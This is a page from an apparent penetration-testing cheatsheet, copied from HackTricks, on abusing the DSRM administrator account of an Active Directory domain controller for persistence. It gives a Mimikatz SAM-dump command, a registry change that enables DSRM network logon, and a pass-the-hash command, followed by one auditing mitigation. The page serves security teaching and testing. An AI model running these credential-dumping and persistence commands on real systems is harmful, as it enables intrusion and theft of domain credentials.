daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

dsrm-credentials.md (3057B)


      1 ---
      2 title: "DSRM Credentials"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/dsrm-credentials.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/dsrm-credentials.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # DSRM Credentials
     14 
     15 ## Basic Information
     16 
     17 Every domain controller has a Directory Services Restore Mode (DSRM) administrator account. Its password is set during domain-controller promotion and is separate from Active Directory domain accounts.<sup>[[1]](#references)</sup>
     18 
     19 An attacker with administrative control of a domain controller can dump the local SAM database and recover the DSRM Administrator NTLM hash. The following Mimikatz command performs that operation:<sup>[[2]](#references)</sup>
     20 
     21 ```powershell
     22 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
     23 ```
     24 
     25 By default, the DSRM account is intended for restore mode. Setting `DsrmAdminLogonBehavior` to `2` permits this local account to authenticate while the domain controller is running normally. Check the value before changing it:<sup>[[2]](#references)[[3]](#references)</sup>
     26 
     27 ```powershell
     28 $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
     29 $current = Get-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue
     30 
     31 if ($null -eq $current) {
     32     New-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD
     33 } else {
     34     Set-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -Value 2
     35 }
     36 ```
     37 
     38 The recovered hash can then be used in a pass-the-hash session to access resources such as the administrative `C$` share. For this local account, use the domain controller's computer name as the `/domain` value:<sup>[[3]](#references)</sup>
     39 
     40 ```powershell
     41 sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
     42 # In the new PowerShell process, access C$ over NTLM.
     43 ls \\dc-host-name\C$
     44 ```
     45 
     46 ## Mitigation
     47 
     48 - Audit changes to `HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior`. Security event 4657 records a registry value modification when the key's SACL is configured to audit **Set Value** operations.<sup>[[4]](#references)</sup>
     49 
     50 ## References
     51 
     52 - [1] [Microsoft: Reset the Directory Services Restore Mode administrator password](https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/reset-directory-services-restore-mode-admin-pwd)
     53 - [2] [ADSecurity: Sneaky Active Directory Persistence #11 — Directory Service Restore Mode](https://adsecurity.org/?p=1714)
     54 - [3] [ADSecurity: Sneaky Active Directory Persistence #13 — DSRM Persistence v2](https://adsecurity.org/?p=1785)
     55 - [4] [Microsoft: Event 4657 — A registry value was modified](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4657)